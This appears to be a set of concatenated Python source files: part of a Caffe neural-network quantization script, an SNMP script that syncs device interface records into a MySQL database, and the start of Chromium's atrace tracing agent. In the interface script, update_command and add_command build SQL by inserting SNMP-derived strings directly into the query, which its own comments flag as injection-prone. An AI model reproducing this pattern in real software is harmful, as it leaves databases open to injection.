    peak = abs(max(flat[0], flat[1], key=abs))
    return math.ceil(math.log(peak, 2)) + 1
# calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
    """Integer length needed by the layer's multiplier.

    Reads entries 2 and 3 of the flattened top blob, where the bit-accurate
    (BAC) net exposes the multiplier extremes — presumably written there by
    the custom ConvolutionIVS/FcIVS layers (TODO confirm).
    """
    blob = net.blobs[layer_top_name].data
    flat = blob.reshape(blob.size)
    peak = abs(max(flat[2], flat[3], key=abs))
    return math.ceil(math.log(peak, 2)) + 1
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto, imdb, max_per_image=100, thresh=0.05, vis=False):
    """Measure the integer length needed by each Conv/Fc layer's adder and
    multiplier by running detection over every image in *imdb*.

    The BAC net is expected to expose accumulator extremes through the first
    four entries of each layer's top blob (see calc_layer_adder_IL /
    calc_layer_multiplier_IL).

    Returns:
        (net_adder_IL, net_multiplier_IL): dicts keyed by layer name.
    """
    num_images = len(imdb.image_index)
    _t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
    if not cfg.TEST.HAS_RPN:
        roidb = imdb.roidb
    net_adder_IL = dict()
    net_multiplier_IL = dict()
    for layer in net_proto.layer:
        # In-place layers would hide the accumulator values; reject them.
        assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
        #if layer.top[0] == layer.bottom[0]:
        #    print layer.name, layer.type
        if layer.type == 'ConvolutionIVS' \
            or layer.type == 'FcIVS' :
            # Seed with the smallest int so any measured range wins the max().
            net_adder_IL[layer.name] = -sys.maxint - 1
            net_multiplier_IL[layer.name] = -sys.maxint - 1
    for i in xrange(num_images):
        print i
        if cfg.TEST.HAS_RPN:
            box_proposals = None
        else:
            box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
        im = cv2.imread(imdb.image_path_at(i))
        scores, boxes = im_detect(net, im, _t, box_proposals)
        for layer in net_proto.layer:
            # Poison one weight per layer with a large sentinel so the
            # accumulator extremes are exercised on the following forward()
            # pass — NOTE(review): the magic 2610214 looks like a value the
            # custom BAC layer recognizes; confirm against its C++ source.
            if layer.type == 'ConvolutionIVS':
                net.params[layer.name][0].data[0][0][0][0]=2610214
            elif layer.type == 'FcIVS':
                net.params[layer.name][0].data[0][0]=2610214
        net.forward()
        for layer in net_proto.layer:
            if layer.type == 'ConvolutionIVS' \
                or layer.type == 'FcIVS':
                # Track the worst case over all images.
                net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
                                               net_adder_IL[layer.name])
                net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
                                                    net_multiplier_IL[layer.name])
    return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
    """Set the adder (accumulator) bit width of every Conv/Fc layer.

    The fractional length is adder_bw minus the layer's required integer
    length (plus extra_IL slack); every other quantization field is passed
    through unchanged via change_layer_bw.
    """
    for layer in net_proto.layer:
        if layer.type not in ('ConvolutionIVS', 'FcIVS'):
            continue
        qp = layer.quantization_param
        adder_FL = adder_bw - (net_adder_IL[layer.name] + extra_IL)
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        qp.bw_params, qp.fl_params,
                        adder_bw, adder_FL,
                        qp.bw_multiply, qp.fl_multiply)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
    """Set the multiplier bit width of every Conv/Fc layer.

    The fractional length is multiplier_bw minus the layer's required
    integer length (plus extra_IL slack); every other quantization field is
    passed through unchanged via change_layer_bw.
    """
    for layer in net_proto.layer:
        if layer.type not in ('ConvolutionIVS', 'FcIVS'):
            continue
        qp = layer.quantization_param
        multiplier_FL = multiplier_bw - (net_multiplier_IL[layer.name] + extra_IL)
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        qp.bw_params, qp.fl_params,
                        qp.bw_add, qp.fl_add,
                        multiplier_bw, multiplier_FL)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
    """Set activation (input and output) bit widths for every quantizable
    layer; the input width mirrors the output width, and fractional lengths
    are derived from the measured integer lengths plus extra_IL slack.
    """
    input_bw = output_bw
    quantizable = ('ConvolutionIVS', 'FcIVS', 'DeconvolutionRistretto')
    for layer in net_proto.layer:
        if layer.type not in quantizable:
            continue
        qp = layer.quantization_param
        output_FL = output_bw - (net_output_IL[layer.name] + extra_IL)
        input_FL = input_bw - (net_input_IL[layer.name] + extra_IL)
        change_layer_bw(net_proto, layer.name,
                        input_bw, input_FL,
                        output_bw, output_FL,
                        qp.bw_params, qp.fl_params,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
    """Set the weight bit width of every ConvolutionIVS layer; the fractional
    length is weighting_bw minus the layer's required integer length (plus
    extra_IL slack). Other quantization fields pass through unchanged.
    """
    for layer in net_proto.layer:
        if layer.type != 'ConvolutionIVS':
            continue
        qp = layer.quantization_param
        weighting_FL = weighting_bw - (net_param_IL[layer.name] + extra_IL)
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        weighting_bw, weighting_FL,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
    """Set the weight bit width of every FcIVS layer; the fractional length
    is weighting_bw minus the layer's required integer length (plus extra_IL
    slack). Other quantization fields pass through unchanged.
    """
    for layer in net_proto.layer:
        if layer.type != 'FcIVS':
            continue
        qp = layer.quantization_param
        weighting_FL = weighting_bw - (net_param_IL[layer.name] + extra_IL)
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        weighting_bw, weighting_FL,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
    """Set the weight bit width of every DeconvolutionRistretto layer; the
    fractional length is weighting_bw minus the layer's required integer
    length (plus extra_IL slack). Other fields pass through unchanged.
    """
    for layer in net_proto.layer:
        if layer.type != 'DeconvolutionRistretto':
            continue
        qp = layer.quantization_param
        weighting_FL = weighting_bw - (net_param_IL[layer.name] + extra_IL)
        change_layer_bw(net_proto, layer.name,
                        qp.bw_layer_in, qp.fl_layer_in,
                        qp.bw_layer_out, qp.fl_layer_out,
                        weighting_bw, weighting_FL,
                        qp.bw_add, qp.fl_add,
                        qp.bw_multiply, qp.fl_multiply)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
    """Parse the text-format prototxt at *ori_net_path* into a fresh
    caffe NetParameter message and return it."""
    net_proto = caffe_pb2.NetParameter()
    with open(ori_net_path) as handle:
        txtf.Merge(handle.read(), net_proto)
    return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
    """Serialize *net_proto* (via its str() text format) to *out_net_path*."""
    with open(out_net_path, 'w') as handle:
        handle.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
    """Load a net + weights and return its mAP on *imdb* without verbose
    output.

    NOTE(review): relies on the module-level `args` for max_per_image/vis —
    only usable after parse_args() has run.
    """
    net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
    # Name the net after the weights file so result logs identify the model.
    net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
    ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
    return ap
#print each layer name and spec
def print_net_layer_names(net):
    """Debug helper: dump name/type/blob-count for each (IVS) convolution
    layer, plus raw introspection output (dir, reshape, params)."""
    print("Network layers:")
    for name, layer in zip(net._layer_names, net.layers):
        if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
            print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
            print dir(layer)
            print layer.reshape
            print layer.convolution_param
    print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
    """Multiprocessing target: evaluate the prototxt at *net_path* on the
    given GPU and store the resulting mAP in *shared_dict* under key *i*.

    NOTE(review): reads the module-level `args` for dataset/model settings.
    """
    #caffe.set_mode_cpu()
    #GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
    cfg.GPU_ID = GPU_ID
    caffe.set_device(GPU_ID)
    caffe.set_mode_gpu()
    imdb = get_imdb(args.imdb_name)
    imdb.competition_mode(args.comp_mode)
    if not cfg.TEST.HAS_RPN:
        imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
    ap = test_qnet(net_path, args.caffemodel, imdb)
    shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
    """Multiprocessing target: run the activation-range analysis on GPU_ID
    and copy the per-layer results into the shared dicts from the parent."""
    cfg.GPU_ID = GPU_ID
    caffe.set_device(GPU_ID)
    caffe.set_mode_gpu()
    #caffe.set_mode_cpu()
    net_proto = read_from_prototxt(args.prototxt_quantized)
    net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
    imdb = get_imdb(args.imdb_name)
    imdb.competition_mode(args.comp_mode)
    if not cfg.TEST.HAS_RPN:
        imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
    net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto, imdb, max_per_image=args.max_per_image, vis=args.vis)
    # Copy key-by-key: the destinations are multiprocessing Manager proxies,
    # not plain dicts.
    for t in net_output_IL_.keys():
        net_output_IL[t] = net_output_IL_[t]
    for t in net_input_IL_.keys():
        net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
    """Multiprocessing target: run the adder/multiplier-range analysis on the
    BAC prototxt and copy the results into the shared dicts from the parent."""
    cfg.GPU_ID = GPU_ID
    #caffe.set_mode_cpu()
    caffe.set_device(GPU_ID)
    caffe.set_mode_gpu()
    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
    imdb = get_imdb(args.imdb_name)
    imdb.competition_mode(args.comp_mode)
    if not cfg.TEST.HAS_RPN:
        imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
    net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC, imdb,
                                        max_per_image=args.max_per_image, vis=args.vis)
    # Copy key-by-key: the destinations are multiprocessing Manager proxies.
    for t in net_adder_IL_.keys():
        net_adder_IL[t] = net_adder_IL_[t]
    for t in net_multiplier_IL_.keys():
        net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
    """Multiprocessing target: compute per-layer parameter integer lengths
    and copy them into the shared dict from the parent."""
    cfg.GPU_ID = GPU_ID
    caffe.set_device(GPU_ID)
    caffe.set_mode_gpu()
    net_proto = read_from_prototxt(args.prototxt_quantized)
    net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
    net_param_IL_ = analyze_net_param_IL(net, net_proto)
    # Copy key-by-key: the destination is a multiprocessing Manager proxy.
    for t in net_param_IL_.keys():
        net_param_IL[t] = net_param_IL_[t]
if __name__ == '__main__':
    # Search driver: finds the smallest adder/multiplier bit widths that
    # keep detection accuracy within 0.005 mAP of the Q8 baseline.
    args = parse_args()
    GPU1 = 0  # device ids for the two parallel evaluation workers
    GPU2 = 1
    print('Called with args:')
    print(args)
    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    cfg.GPU_ID = args.gpu_id
    print('Using config:')
    pprint.pprint(cfg)
    manager = multiprocessing.Manager()
    shared_dict = manager.dict()  # mAP results shared with worker processes
    # Hard-coded reference accuracies measured beforehand for this model.
    full_ap = 0.661509413341
    layer_ap = 0.652
    print 'Full precision accuracy : {}'.format(full_ap)
    print 'Q8 accuracy : {}'.format(layer_ap)
    # Bit Width for Analyze
    bw_range_conv = [8, 4] #bit width for convolution layers
    bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
    bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
    bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
    bw_conv = 0 #just initial
    bw_deconv = 0 #just initial
    bw_fc = 0 #just initial
    bw_output = 8 #just initial
    bw_adder = 12 #just initial
    bw_multiplier = 12 #just initial
    # Extra integer-length slack applied on top of the measured ranges.
    convIL_reduction = 0
    deconvIL_reduction = 0
    fcIL_reduction = 0
    actIL_reduction = -1
    adderIL_reduction = 0
    multIL_reduction = 0
    print 'Create Bit-Accurate quantized prototxt'
    convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    print 'Loading Bit-Accurate quantized prototxt'
    #print 'Analyzing network adder and multiplier'
    net_adder_IL = manager.dict()
    net_multiplier_IL = manager.dict()
    if args.accumulator_analysis == None:
        # No cached analysis: measure accumulator ranges in a worker process
        # and cache the result to JSON for later runs.
        print 'Analyzing network adder and multiplier'
        p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
                                    args=(net_adder_IL, net_multiplier_IL, GPU1))
        p.start()
        p.join()
        with open('accumulator_analysis.json', 'w') as outfile:
            accumulator_analysis = dict()
            accumulator_analysis['net_adder_IL'] = dict()
            accumulator_analysis['net_multiplier_IL'] = dict()
            for t in net_adder_IL.keys():
                accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
            for t in net_multiplier_IL.keys():
                accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
            json.dump(accumulator_analysis, outfile)
    else:
        # Reuse a previously saved accumulator analysis file.
        print 'Loading network adder and multiplier analysis file'
        with open(args.accumulator_analysis) as json_data:
            accumulator_analysis = json.load(json_data)
            for t in accumulator_analysis['net_adder_IL'].keys():
                net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
            for t in accumulator_analysis['net_multiplier_IL'].keys():
                net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
    convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
    print 'Analyzing layer multiplier'
    print '\tbit width\t accuracy'
    # Linear search upward from the activation width, testing two candidate
    # multiplier widths at a time (one per GPU) until accuracy is within
    # 0.005 mAP of the Q8 baseline.
    i = bw_output
    not_found = True
    while not_found:
        timer = Timer()
        timer.tic()
        jobs = []
        net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
        quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
        write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
        p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
                                     './temp'+str(i)+'.prototxt',
                                     shared_dict,GPU1))
        jobs.append(p1)
        p1.start()
        net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
        quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
        write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
        p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
                                     './temp'+str(i+1)+'.prototxt',
                                     shared_dict,GPU2))
        jobs.append(p2)
        p2.start()
        for proc in jobs:
            proc.join()
        timer.toc()
        for j in range(i, i+2):
            print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
        for j in range(i, i+2):
            # Accept the first width whose accuracy drop is under 0.005 mAP.
            if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
                bw_multiplier = j
                not_found = False
                break;
        i = i + 2
    # Bake the chosen multiplier width into the BAC prototxt.
    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
    write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
    # Earlier binary-search variant, kept for reference:
    #bw_h = 16
    #bw_l = 0
    #bw = 16
    #print 'Analyzing layer multiplier'
    #print '\tbit width\t accuracy'
    #while True:
    #    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    #    quantize_net_multiplier(net_BAC, net_proto_BAC, net_multiplier_IL, bw)
    #    write_to_prototxt(net_proto_BAC, './temp.prototxt')
    #    ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
    #    print '\t{}bit:\t\t{}'.format(bw,ap)
    #    if ap < (full_ap - args.error_margin):
    #        bw_l = bw
    #    else:
    #        bw_h = bw
    #        bw_multiplier = bw
    #    if bw_h - bw_l <=1:
    #        break
    #    bw = bw_l + (bw_h-bw_l)/2
    print 'Analyzing layer adder'
    print '\tbit width\t accuracy'
    # Same two-at-a-time linear search as above, now for the adder width.
    i = bw_output
    not_found = True
    while not_found:
        timer = Timer()
        timer.tic()
        jobs = []
        net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
        quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
        write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
        p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
                                     './temp'+str(i)+'.prototxt',
                                     shared_dict,GPU1))
        jobs.append(p1)
        p1.start()
        net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
        quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
        write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
        p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
                                     './temp'+str(i+1)+'.prototxt',
                                     shared_dict,GPU2))
        jobs.append(p2)
        p2.start()
        for proc in jobs:
            proc.join()
        timer.toc()
        for j in range(i, i+2):
            print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
        for j in range(i, i+2):
            # Accept the first width whose accuracy drop is under 0.005 mAP.
            if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
                bw_adder = j
                not_found = False
                break;
        i = i + 2
    # Earlier binary-search variant, kept for reference:
    #bw_h = 16
    #bw_l = 0
    #bw = 16
    #print 'Analyzing layer adder'
    #print '\tbit width\t accuracy'
    #while True:
    #    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    #    quantize_net_adder(net_BAC, net_proto_BAC, net_adder_IL, bw)
    #    write_to_prototxt(net_proto_BAC, './temp.prototxt')
    #    ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
    #    print '\t{}bit:\t\t{}'.format(bw,ap)
    #    if ap < (full_ap - args.error_margin):
    #        bw_l = bw
    #    else:
    #        bw_h = bw
    #        bw_adder = bw
    #    if bw_h - bw_l <=1:
    #        break
    #    bw = bw_l + (bw_h-bw_l)/2
    # Rebuild the BAC prototxt from scratch and apply both chosen widths,
    # then run one final evaluation to report the combined accuracy.
    print 'Create Final Bit-Accurate quantized prototxt'
    convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
    net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
    print 'Loading Final Bit-Accurate quantized prototxt'
    quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
    quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
    write_to_prototxt(net_proto_final, './temp_f.prototxt')
    p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
                                shared_dict,GPU1))
    p.start()
    p.join()
    ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
    #ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
    print '----------------------------------------'
    print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
    print 'Accuracy {}'.format(ap)
    print 'Dynamic fixed point net:'
    print '{}bit CONV and DECONV weights'.format(bw_conv)
    print '{}bit FC weights'.format(bw_fc)
    print '{}bit layer activations'.format(bw_output)
    print '{}bit adder'.format(bw_adder)
    print '{}bit multiplier'.format(bw_multiplier)
    print 'Please fine-tune'
    write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
    print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
|
regular_interface_update.py | from common_tasks import Grab_device_interfaces_snmp, get_data, set_data_mysql
from SNMPPoll import SnmpPoll as snmppoll
from Classes import ToolLog
def Device_interfaces_update():
    """
    Author - Jonathan Steward
    Function - Workflow function: sync interface records for every device
    Inputs - n/a
    returns -
        int - updates - the number of interface records updated
        int - adds - The number of interface records added
        int - unreachable - the number of devices that did not answer SNMP
    """
    devices = get_data("SELECT * FROM `FYP Data`.device_table;")
    updates = adds = unreachable = 0
    # Each device folds its counts into the running totals.
    for device in devices:
        updates, adds, unreachable = process_interfaces(device, updates, adds, unreachable)
    return updates, adds, unreachable
"""
# uncomment below to enable threading
for device in devices:
t = Thread(target=Device_grab_interfaces, args=(device,))
t.start()
"""
def process_interfaces(device, updates, adds, unreachable):
    """
    Author - Jonathan Steward
    Function - Function to carry out the logic to detect new or update interfaces and add to DB
    Inputs -
        Device - touple - one data record from the database containing device details
        updates - int - Number of updates so far
        adds - int - Number of added interfaces so far
        unreachable - int - Number of unreachable devices so far
    returns -
        int - updates - the number of interface records updated
        int - adds - The number of interface records added
        int - unreachable - the number of devices that did not answer SNMP
    """
    print "grabbing details for:\n{}".format(device)
    # Unpack the full device row; only device_id/device_ip/community are
    # used in this function.
    (device_id, device_ip, vendor,
     community, username, passwd,
     enpass, config_lock, lock_reason, asn) = device
    device_interfaces = grab_device_interfaces(device_ip, community)
    if not device_interfaces:
        # Device did not answer any SNMP walk; count it and move on.
        unreachable += 1
        return updates, adds, unreachable
    command = "SELECT * FROM `FYP Data`.interfaces where device_id = {}".format(device_id)
    db_interfaces = get_data(command)
    # db_interfaces will be ID/device_id/name/description/ip_address/state/lastupdate/traffic_counter/speed
    for ifindex, device_int in device_interfaces.items():
        # Checking new device interface
        state = "new"
        for interface in db_interfaces:
            # finding matching database interface
            if device_int["name"] == interface[2]:
                # Compare each tracked field; the first mismatch triggers a
                # DB update and stops further checks for this interface.
                if device_int["description"] != interface[3]:
                    state = "update"
                    updates += 1
                    command = update_command(device_int, interface)
                    print "need to update record"
                    break
                if device_int["speed"] != interface[8]:
                    state = "update"
                    updates += 1
                    command = update_command(device_int, interface)
                    print "need to update record"
                    break
                if device_int["ip"] != interface[4]:
                    state = "update"
                    updates += 1
                    command = update_command(device_int, interface)
                    print "need to update record"
                    break
                if device_int["state"] != interface[5]:
                    state = "update"
                    updates += 1
                    command = update_command(device_int, interface)
                    print "need to update record"
                    break
                state = "good"
                # print "interface details the same as the database."
                break
            else:
                continue
        # itterated through all db interfaces
        if state == "new":
            # No DB row matched this interface name: insert a new record.
            adds += 1
            print "A new interface was detected: {}".format(device_int["name"])
            command = add_command(device_int, device_id)
    return updates, adds, unreachable
def grab_device_interfaces(device_ip, community):
    """
    Author - Jonathan Steward
    Function - Grab details for device interfaces along with stats and set all information into one dictionary
    Inputs -
        device_ip - string - ip address of device
        community - string - community details for snmp
    returns -
        dictionary - device_interfaces - keyed based on oid interface.
        Returns None when any SNMP walk fails (device unreachable).
    """
    device_interfaces = {}
    interface_name_results = Grab_device_interfaces_snmp(device_ip, community)
    if not interface_name_results:
        return
    interface_descriptions = snmppoll("WALK", ".1.3.6.1.2.1.31.1.1.1.18", device_ip, community)
    if not interface_descriptions:
        return
    interface_ip = snmppoll("WALK", ".1.3.6.1.2.1.4.20.1.2", device_ip, community)
    if not interface_ip:
        return
    interface_state = snmppoll("WALK", ".1.3.6.1.2.1.2.2.1.8", device_ip, community)
    if not interface_state:
        return
    interface_speed = snmppoll("WALK", ".1.3.6.1.2.1.2.2.1.5", device_ip, community)
    if not interface_speed:
        return
    for inter in interface_name_results:
        device_interfaces[inter.oid_index] = {
            "name": inter.value,
            "description": "",
            "ip": "",
            "state": "",
            # Bug fix: default the speed so interfaces with no matching speed
            # row do not raise KeyError when later compared/inserted by
            # process_interfaces / add_command.
            "speed": 0
        }
        for desc in interface_descriptions:
            if desc.oid_index == inter.oid_index:
                device_interfaces[inter.oid_index]["description"] = desc.value
                break
        # The IP table is keyed by address: value holds the ifIndex and
        # oid_index holds the address itself.
        for ip in interface_ip:
            if ip.value == inter.oid_index:
                device_interfaces[inter.oid_index]["ip"] = ip.oid_index
                break
        for speed in interface_speed:
            if speed.oid_index == inter.oid_index:
                device_interfaces[inter.oid_index]["speed"] = int(speed.value)
                break
        for state in interface_state:
            if state.oid_index == inter.oid_index:
                # ifOperStatus: 1 means up, everything else is treated down.
                if state.value == "1":
                    state.value = "up"
                else:
                    state.value = "down"
                device_interfaces[inter.oid_index]["state"] = state.value
                break
    return device_interfaces
def update_command(device_int, db_int):
    """
    Author - Jonathan Steward
    Function - updating database with new interface state
    Inputs -
        device_int - dictionary - details of the interface for the state update
        db_int - list - details of the interface from the db, used for the id of the int record
    returns - n/a
    NOTE(review): values are interpolated straight into the SQL string —
    vulnerable to SQL injection if interface data is attacker-controlled.
    """
    values = (device_int["description"],
              device_int["ip"],
              device_int["state"],
              device_int["speed"],
              db_int[0])
    sql = """
    UPDATE `FYP Data`.`interfaces`
    SET `description`='{}', `ip_address`='{}', `state`='{}', `speed` ="{}"
    WHERE `interface_id`='{}';""".format(*values)
    set_data_mysql(sql)
def add_command(device_int, device_id):
    """
    Author - Jonathan Steward
    Function - Adds a new interface into the DB
    Inputs -
        device_int - dictionary - details of the interface for the state update
        device_id - int - device_id of the related device for linking in the DB
    returns - n/a
    NOTE(review): values are interpolated straight into the SQL string —
    vulnerable to SQL injection if interface data is attacker-controlled.
    """
    values = (device_id,
              device_int["name"],
              device_int["description"],
              device_int["ip"],
              device_int["state"],
              device_int["speed"])
    sql = """
    INSERT INTO `FYP Data`.`interfaces`
    (`device_id`,`name`,`description`,`ip_address`,`state`, `speed`)
    VALUES('{}','{}','{}','{}','{}', '{}');""".format(*values)
    set_data_mysql(sql)
def main():
    """Entry point: sync all device interfaces and record the run outcome
    in the tool log."""
    run_log = ToolLog("update global interfaces", "")
    updates, adds, unreachable = Device_interfaces_update()
    summary = "Updated: {} Added: {} Unreachable: {}".format(updates, adds, unreachable)
    run_log.set_tool_log(True, summary)
if __name__ == "__main__":
    # Script entry point: run a one-shot global interface sync.
    main()
|
atrace_agent.py | # Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import py_utils
import subprocess
import sys
import threading
import zlib
from devil.android import device_utils
from py_trace_event import trace_time
from systrace import tracing_agents
from systrace import util
# --- Module-level constants for the atrace tracing agent. ---
# Text that ADB sends, but does not need to be displayed to the user.
ADB_IGNORE_REGEXP = r'^capturing trace\.\.\. done|^capturing trace\.\.\.'
# The number of seconds to wait on output from ADB.
ADB_STDOUT_READ_TIMEOUT = 0.2
# The adb shell command to initiate a trace.
ATRACE_BASE_ARGS = ['atrace']
# If a custom list of categories is not specified, traces will include
# these categories (if available on the device).
DEFAULT_CATEGORIES = 'sched gfx view dalvik webview input disk am wm'.split()
# The command to list trace categories.
LIST_CATEGORIES_ARGS = ATRACE_BASE_ARGS + ['--list_categories']
# Minimum number of seconds between displaying status updates.
MIN_TIME_BETWEEN_STATUS_UPDATES = 0.2
# ADB sends this text to indicate the beginning of the trace data.
TRACE_START_REGEXP = r'TRACE\:'
# Plain-text trace data should always start with this string.
TRACE_TEXT_HEADER = '# tracer'
# The property name for switching on and off tracing during boot.
BOOTTRACE_PROP = 'persist.debug.atrace.boottrace'
# The file path for specifying categories to be traced during boot.
BOOTTRACE_CATEGORIES = '/data/misc/boottrace/categories'
def list_categories(options):
    """List the possible trace event categories.

    This function needs the tracing options since it needs to get the serial
    number of the device to send a command to.

    Args:
        options: Tracing options.
    """
    devutils = device_utils.DeviceUtils(options.device_serial_number)
    # Print the raw `atrace --list_categories` output, one line per category.
    print '\n'.join(devutils.RunShellCommand(LIST_CATEGORIES_ARGS))
def get_available_categories(options):
    """Gets the list of atrace categories available for tracing.

    Args:
        options: Tracing options (provides the device serial number).

    Returns:
        List of bare category names (text before the first '-', stripped).
    """
    device = device_utils.DeviceUtils(options.device_serial_number)
    raw_lines = device.RunShellCommand(LIST_CATEGORIES_ARGS)
    return [line.split('-')[0].strip() for line in raw_lines]
def try_create_agent(options):
    """Create an Atrace agent.

    Args:
        options: Command line options.

    Returns:
        A BootAgent or AtraceAgent when tracing is supported; False when the
        target is not android, tracing is from a file, or the device SDK is
        too old. NOTE(review): callers appear to treat any falsy value as
        "no agent" — returning False rather than None looks intentional but
        is worth confirming against the agent registry.
    """
    if options.target != 'android':
        return False
    if options.from_file is not None:
        return False
    # Check device SDK version.
    device_sdk_version = util.get_device_sdk_version()
    if device_sdk_version <= 17:
